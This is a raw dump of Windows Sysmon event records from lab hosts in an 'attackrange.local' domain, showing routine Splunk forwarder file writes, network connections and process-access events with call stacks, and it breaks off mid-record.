16:28:05.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FF75EEFD5F026AF3F20B0E2DB9C8591,SHA256=CE9E9389713188DD76BD63AB7C808A9AB8F9BFF3D4EBF2E566FE034A8F2711A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245571Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:06.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C205F6F665CD68FC2F157D34DE7CDAC4,SHA256=AFA2B827ECA9E8AAD17F98B49AEA277C6DF7028A62C35E606B236A90046FFF11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060898Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:07.239{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4859B0FAF831272F3E2BBE3B6E9DEB96,SHA256=773F55F6643F9190F8E2A26CB3AFE60B211C2EFC0233FB73D6635BDD0C32A10A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245572Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:07.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98609208EA2C17B5EE9779AEB654935A,SHA256=98038CBE436E17FA0AB7D70C860A4075F850081D8C6EB47C21D677BA444DEBB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060900Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:08.598{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAAB057029316B2BD63AF6B55823A3CD,SHA256=4DBEFBD2B08874EE49DF0ADFD317B636C958AE16935FA296BF7F3148B23F9F6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060899Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:06.075{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54774-false10.0.1.12-8000- 23542300x8000000000000000245575Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:08.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F28C75B94F3DD4E80F20B1F5257EDEA,SHA256=1DAE731D7ED6D6F0BFFA763C5C81BA7EBC546AB46FEE3671BA3BD443A14CB1B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245574Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:08.265{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E37AFFFE268DA871EFC8E6BBFBC6AB9,SHA256=C2BEF4CD11573012F44D633BE3DC2AD3E177E3265B695AC2605D77FF30231A91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245573Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:08.265{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA677F20548BE2637A8AA6E6A7D1E556,SHA256=7B4B7A7162CA86054BB1D6794F23B3798A53C8887706B531142360DCB2B95C8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060901Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:09.958{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9E84E14ABB9BB26C20736889EABB871,SHA256=B5F7E5CBA8ED4B14881BF1B814AAE6049B93F05AA76B58B5FF10A85874409311,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245576Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:09.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13DE9FE830771AED19D8615DC7010DDE,SHA256=5EE8B4F956AA92F6A68C1FF371CE6F74B887BEDAF38972E0192E98232ADA8B74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245578Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:10.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=004CD72541D06050E96B38C653E7E672,SHA256=43D5FF1FA8E3D39220EB99A50F5DE16FB5CBA4038E9B600F5E0315A6E184C714,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245577Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:07.664{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64761-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001060902Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:11.318{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D8BF600388FC800D94A7CBF079BA27C,SHA256=BE0DD761F1466E35532B038131826708B63C583219A64BE9C0B6C6FBF69DBA4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245579Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:11.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D5DCB815305FE5D88BA3FF4899F917C,SHA256=E0F76314427B3DE3F2149671152236F569951561F7981DEF7F7BF882D30C3339,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245580Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:12.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=706AD54525ED30066F40EADC19C18379,SHA256=72A8136CA26D3AB686A435FDD9937F44F7C4DCAC40155933A1E0E89BD7425EB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060903Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:13.318{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B4676167EB1EE71026DE7ACD3A763DB,SHA256=32A5915F9A17344E829138ADDB2A1B045BD4C96E126DC67E41FA40166EFB8196,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245581Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:13.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=668E26C5AB5F4987B0C324BB3B1B6F1F,SHA256=BB9F4D583FFAA40A5301597527A3F5F11972C943D6FEA9C3E49A4D6E01EF8243,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060904Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:14.990{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C00A297C884C7F407FB37F788918454,SHA256=26CB738BF5F26024EE0B4DF195DB05E770044354ECBE95FC0641CBBF459451A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245584Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:14.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06D584D52F5926370CB64D1C1DB8FE63,SHA256=926C7B58B0548B9CBD55ECD34ED2EB743D589F11F3861C7314A2C815A472DF99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245583Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:14.093{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A8607694866B493EB783012FECD3D51,SHA256=92151D8DAF8089DAE1833BC883A5CD50A57C4957CCD13C25EF0840EA83D94A43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245582Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:14.093{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E37AFFFE268DA871EFC8E6BBFBC6AB9,SHA256=C2BEF4CD11573012F44D633BE3DC2AD3E177E3265B695AC2605D77FF30231A91,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060905Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:11.950{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54775-false10.0.1.12-8000- 354300x8000000000000000245586Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:13.508{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64762-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245585Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:15.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D99BFE9773E5D3113764FE13208327F3,SHA256=D09E0EF3BABCD763360C8CCECA89DBB246B75F5D8C11EE00E03C8C7D9422A22A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060907Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:16.396{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54C217C2EA48A3AE55BA0D8E7BD29FA1,SHA256=EBCBEC827E7949C03D126169285795D048AE9C9CA6D558F22C2B79F860565EC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060906Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:16.396{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFDCF698E289B1DD14862970E1FA2E1B,SHA256=37CD7D6528AC7F707157AC467DD96AC4244E262DBE0C8128834FC8EDA85EBC36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245587Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:16.954{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A6F54D030BA69B81FDD716698B445B8,SHA256=CABFEACECBC5C23EDB1FC0C770F91FEDB94565381DAB0246FEAC5D231E5C3B90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060908Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:17.756{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78C2DE45D628C072D07068165352C77D,SHA256=F953DDB1AB040147723B2A1A7480EF0B3B84EDACB5B38B769656961B4B7EE542,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245588Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:17.955{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C00A8962D0E5AF1ADAFEA367115F1B78,SHA256=ACD8E05C8E2C6E42F19DD587BED43B05C5F89FD7C5401A7E75BDA02D7C3ED307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245589Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:18.956{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4231CC624E63D8BA9AAB13D24861D5B2,SHA256=4C89D79697FE76560CFD8AF05555FD37EF3550FF858A2ABB7C4D89FB7604E6D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060926Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.929{7F8C56E7-51A3-6063-1A01-00000000AF01}51322600C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060925Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.803{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51A3-6063-1A01-00000000AF01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060924Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.803{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060923Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.803{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060922Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.803{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060921Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.803{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060920Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.803{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-51A3-6063-1A01-00000000AF01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060919Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.803{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51A3-6063-1A01-00000000AF01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060918Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.806{7F8C56E7-51A3-6063-1A01-00000000AF01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001060917Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.131{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51A3-6063-1901-00000000AF01}4980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060916Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:19.131{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060915Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 